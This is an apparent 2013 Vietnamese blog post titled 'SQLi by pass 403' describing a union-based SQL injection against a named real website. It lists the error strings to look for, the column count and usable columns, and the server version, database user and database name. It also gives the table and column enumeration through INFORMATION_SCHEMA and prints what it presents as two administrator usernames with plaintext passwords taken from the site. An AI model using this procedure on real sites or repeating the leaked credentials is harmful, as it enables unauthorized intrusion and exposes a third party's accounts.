Thứ Ba, 14 tháng 5, 2013

SQLi by pass 403


Lổi
Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect
típ

típ

típ

Vậy web có 16 colums
đặt dấu - ở trước số id và dấu -- ở cuối
ta được :
2

4
cột 2 & 4 có thể sử dụng
lấy version tại cột 2
=>
5.1.37-1ubuntu5.5
get user() tại cột 2
=>
ettu_admin@localhost
get database()
ettu.org_ettu_db01
get table => group_concat(table_name) ở cột 2
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() -> show tất cả table ở database
đổi table_name thành colum_name đề get colum
show các colum name

=>
id,login,password,stato,id_squ,girone,abilitato
đọc id pass administrator
1:adminvitesse:vitesse2006

2:admin:matchvitesse

0 nhận xét:

Đăng nhận xét